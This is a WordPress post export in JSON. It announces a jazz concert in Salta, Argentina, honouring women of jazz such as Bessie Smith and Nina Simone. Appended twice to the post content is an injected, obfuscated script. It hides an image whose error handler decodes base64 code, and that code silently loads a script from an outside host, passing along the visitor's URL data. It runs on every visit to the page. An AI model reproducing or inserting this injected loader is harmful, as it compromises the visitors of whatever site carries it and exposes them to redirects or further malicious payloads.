{"id":1619,"date":"2022-10-17T11:25:55","date_gmt":"2022-10-17T14:25:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1619"},"modified":"2025-08-14T00:33:08","modified_gmt":"2025-08-14T03:33:08","slug":"blue-mujeres-de-jazz-y-libertad-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1619","title":{"rendered":"Blue! Mujeres de Jazz y Libertad en el Teatro Provincial"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#be0e3a\"><em>En el marco del Festival Salta Jazz, este viernes 21 de octubre, a partir de las 21, tendr\u00e1 lugar un recorrido por las obras m\u00e1s sobresalientes de las mujeres que dejaron su impronta en la historia del g\u00e9nero musical.<\/em><\/h4>\n\n\n\n<p>De los realizadores de \u201cThe Wall 40 a\u00f1os\u201d y \u201cCelebrando The Beatles\u201d, en el marco del Festival Salta Jazz 2022, llega: \u201cBlue! Mujeres de Jazz y Libertad\u201d.<\/p>\n\n\n\n<p>Se trata de un conmovedor viaje a los comienzos de una expresi\u00f3n marcada por los m\u00e1s dolorosos actos del hombre contra s\u00ed mismo, lenguaje de libertad y eternidad: el Jazz. &nbsp;El arte que independiz\u00f3 mental y emocionalmente a los afroamericanos, que amalgam\u00f3 ideas, culturas, voces y m\u00fasicas de todo el mundo.<\/p>\n\n\n\n<p>Una revoluci\u00f3n que comienza a finales del siglo XIX en el sur de los Estados Unidos, donde las mujeres lucharon no solo contra la esclavitud y el racismo, tambi\u00e9n el machismo y todas las formas posibles de violencia y sometimiento. Ma&#8217; Rainey, Bessie Smith, BillieHoliday, Ella FitzGerald, Nina Simone, resistieron y crearon arriesgando todo, hasta sus propias vidas. Cantaron con profundidad y entereza a la injusticia en un pa\u00eds segregacionista y paranoico con el \u00e9xito de mujeres talentosas, independientes, desafiantes y negras.<\/p>\n\n\n\n<p>Con la participaci\u00f3n de Pato Pacheco, Pipi Tob\u00edo, Daniela Zunino, Mart\u00edn Misa, Negro Mayor, Leonel Luquez, Ricardo Cavalli, Luis Nacht, FefeBotti y la Orquesta Swingf\u00f3nica Salta Jazz, dirigida por Mart\u00edn Bonilla. Un recorrido a trav\u00e9s de las emociones y sentidos, a los or\u00edgenes del jazz y las voces que inmortalizaron el orgullo y la dignidad.<\/p>\n\n\n\n<p>Las entradas ya se encuentran a la venta en&nbsp;<a href=\"http:\/\/www.norteticket.com\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.norteticket.com<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/blue-mujeres-de-jazz-y-libertad-en-el-teatro-provincial-85511\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Festival Salta Jazz, este viernes 21 de octubre, a partir de las 21, tendr\u00e1 lugar un recorrido por las obras m\u00e1s sobresalientes de las mujeres que dejaron su impronta en la historia del g\u00e9nero musical. De los realizadores de \u201cThe Wall 40 a\u00f1os\u201d y \u201cCelebrando The Beatles\u201d, en el marco del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1622,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1619","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1619"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1619"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1619\/revisions"}],"predecessor-version":[{"id":7317,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1619\/revisions\/7317"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1622"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1619"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1619"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1619"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}